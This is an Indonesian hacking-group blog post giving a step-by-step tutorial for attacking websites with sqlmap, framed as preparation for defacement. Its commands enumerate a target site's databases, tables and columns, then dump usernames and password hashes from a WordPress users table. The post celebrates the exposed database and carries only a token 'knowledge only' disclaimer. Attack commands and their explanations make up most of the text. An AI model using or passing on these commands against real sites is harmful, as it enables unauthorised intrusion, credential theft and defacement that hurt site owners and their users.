Advertisement
Advertisement
Advertisement

Search

Ingat Kami Disini Hanya Memberi Pengetahuan dan tidak lebih .. Silahkan menggunakan Pengetahuan tersebut dengan bijak,dan kami tidak bertanggung jawab atas apapun yang terjadi! - by CEO,Admin,Author IHC-Team
TEAM KAMI SUDAH BUBAR SEJAK 2016 best Regard AnonGhost.ID | INDONESIA HACKER CYBER TEAM

Deface dengan SQLMap di windows

Posted by IHC-Team


INDONESIA HACKER CYBER TEAM

UDah lama kagak Post tentang Deface :v bertemu kembali dengan saya ./Dr.D4fuq404 :D
ane mau share ilmu nihh yaitu 


alat alat yang anda butuhkan :
- DORK SQLmap
- Phyton 2.7
- Script SQLmap
- Internet
- Windows

pertama kita buka CMD lalu ketikan command berikut

sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id
=37 --dbs
atau bisa juga dengan command berikut
 sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id=37 --current-db
lalu tekan  enter,,jika site nya vuln atau vulnerable maka hasilnya akan tampak seperti SS yang ada di bawah ini 
klik untuk memperbesar
untuk tahap selanjutnya lalu ita ketikan command di bawah pada CMD sobat ( sebelumnya sobat sudah menentukan database mana yang ingin sobat lihat )

sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 --tables

maka hasilnya akan tampak seperti yang ada di SS di bawah

klik untuk memperbesar
selanjutnya kita ketikan lagi command yg di bawah ini di CMD sobat
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users --columns
maka hasilnya akan tampak seperti ss di bawah
klik untuk memperbesar
langkah selanjutnya kita ketikan command yg di bawah ini di CMD sobat
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id
=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users -C user_login,user_pass --dump

 maka hasilnya seperti yang di bawah ini  jreng jreng telanjang dah tuh database website nya 

klik untuk memperbesar 
sebagai catatan buat sobat arti dari command command yang di atas :
--dbs ( memanggil semua database yang ada dalam server )
--current-db ( hanya mengambil database yang terkait di dalam situs web tersebut )
--tables ( memanggil table yang ada di dalam database )
--columns ( memanggil kolom yang ada di dalam database table )
--dump ( memanggil username dan password yg terdapat di dalam database tabel )


Related Post



Posting Komentar

~ SEBELUM KOMEN , PERHATIKAN PERATURAN KOMENTAR DI SINI ~

1. Dilarang Komentar Dengan Kata Kasar , PROMOSI , SARA , PORNOGRAFI , SPAM , dan Hal-Hal yg tidak bagus
2. Dilarang koment dengan LINK aktif contoh WEBSITE , BLOG

Visitor

hit counter